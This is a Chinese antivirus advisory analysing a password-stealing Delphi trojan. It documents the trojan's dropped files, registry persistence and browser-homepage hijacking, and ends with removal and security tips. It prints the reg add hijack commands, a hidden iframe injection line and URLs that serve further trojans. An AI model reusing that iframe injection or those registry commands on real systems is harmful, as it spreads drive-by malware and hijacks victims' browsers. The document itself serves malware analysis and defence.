據超級巡警團隊監測與收集的信息，網馬.生成器的泛濫與中小型網站的安全機制不健全，使得大量網頁木馬危害網友們的正常網路生活。形成了“掛馬網站多，下載木馬多，木馬變種多”的“三多現象”。超級巡警團隊提示網友要提高安全意識、加強計算機安全
機制。
一、病毒相關分析：
病毒標籤：
病毒名稱：Trojan-PSW.Win32.Delf.wh
病毒類型：木馬
危害級別：2
感染平台：Windows 平台
病毒大小：16,944 位元組
SHA1：251f2fc974065a5da44ca4525efb419d7b3a0a54
加殼類型：UPX //修改過
開發工具：Borland Delphi 6.0 - 7.0
病毒分析：
1、檔案運行後會.釋放一個bat檔案
%temp%\2443954.bat
2443954.bat會執行指令Set date=%date%和date 1987-10-18修改系統時間
並多次帶參數執行ping 127.0.0.1　//可能是為了禁止防火牆
2、調用reg.exe修改IE主頁與默認頁為http://www.94ak.com　//該網站已被掛馬
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Start Page" /t
REG_SZ /d "http://www.94ak.com" /f
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t
REG_SZ /d "http://www.94ak.com" /f
3、網站http://www.94ak.com掛馬代碼：
<iframe src=http://www.851733.cn/htm/wm/wm2.htm width=0 height=0></iframe>
4、http://www.851733.cn/htm/wm/wm1.htm
http://www.851733.cn/htm/wm/wm2.htm
http://www.851733.cn/htm/wm/wm3.htm
均為經過加密處理的網頁木馬，通過它們下載其他木馬檔案。三個網頁的免殺方式相同，不同的地方只是不同的網
頁使用了不同的變數名及下載檔案.的地址。用網馬生成器或改變一下變.量名，就可以輕鬆改造出大量網馬。
http://www.851733.cn/htm/down.exe　16,944 位元組
http://www.851733.cn/htm/vip.exe　16,944 位元組
均為同一檔案，檔案MD5值相同
5、下載檔案.運行後釋放檔案：
%Program Files%\Internet Explorer\PLUGINS\NewTemp.dll 10,800 位元組
%Program Files%\Internet Explorer\PLUGINS\NewTemp.bak 16,944 位元組
並將NewTemp.dll注入到所有正在運行中的進程，然後下載以下檔案
http://down.851733.cn/1.exe　91,648 位元組
http://down.851733.cn/2.exe　11,396 位元組
http://down.851733.cn/3.exe　15,360 位元組
http://down.851733.cn/4.exe　28,369 位元組
http://down.851733.cn/5.exe　11,742 位元組
http://down.851733.cn/6.exe　33,395 位元組
http://down.851733.cn/7.exe　10,240 位元組
http://down.851733.cn/8.exe　14,940 位元組
http://down.851733.cn/9.exe　14,600 位元組
http://down.851733.cn/10.exe　24,977 位元組
http://down.851733.cn/11.exe　16,788 位元組
http://down.851733.cn/12.exe　38,032 位元組
http://down.851733.cn/13.exe　13,416 位元組
http://down.851733.cn/14.exe　180,169 位元組
http://down.851733.cn/15.exe　12,457 位元組
http://down.851733.cn/16.exe　13,832 位元組
http://down.851733.cn/17.exe　12,068 位元組
http://down.851733.cn/18.exe　22,244 位元組
http://down.851733.cn/19.exe　193,901 位元組
http://down.851733.cn/20.exe　16,272 位元組
6、註冊表.操作：
註冊表鍵： HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
註冊表值：
類型： REG_SZ
註冊表鍵： HKCR\CLSID\\InProcServer32
註冊表值： （默認）
類型： REG_SZ
值： C:\Program Files\Internet Explorer\PLUGINS\NewTemp.dll
二、解決方案
自動查殺：
1、升級超級巡警到最新病毒庫，並進行全盤掃描。
2、如無特殊需要，使用超級巡警禁止網站www.94ak.com與down.851733.cn。
三、安全建議
1、立即安裝或更新防病毒軟體並對記憶體和硬碟全面掃描(推薦安裝超級巡警)。
2、使用超級巡警的補丁檢查功能，檢查系.統補丁，並及時安裝補丁。
3、不要隨便已分享檔案或資料夾，即使要使用共享，應先設定好許可權，另外不建議設定可寫或可控制。
4、不要隨便打開不明來歷的電子郵件，尤其是郵件附屬檔案。
5、不要隨便登入不明網站，特別不要隨意登入需要自己銀行帳號或手機及計算機系統帳號的不明網站。
6、使用移動存儲介質進行數據訪問時，先對其進行病毒檢查，建議使用超級巡警隨身碟免疫器進行免疫。
7、做好系統和重要數據的備份，以便能夠進行系統和數據災難恢復。
Currently there is no description available for this program. 字串2
As many viruses and worms are modifications of earlier versions, it may help you to check the descriptions of similar programs. If such descriptions are available, they will be listed at the top of the page.
Our virus analysts work hard to ensure that descriptions of the commonest and most potentially dangerous software are available to users. The Virus Encyclopedia is updated on a regular basis.
大部分國外防毒軟體已能查殺。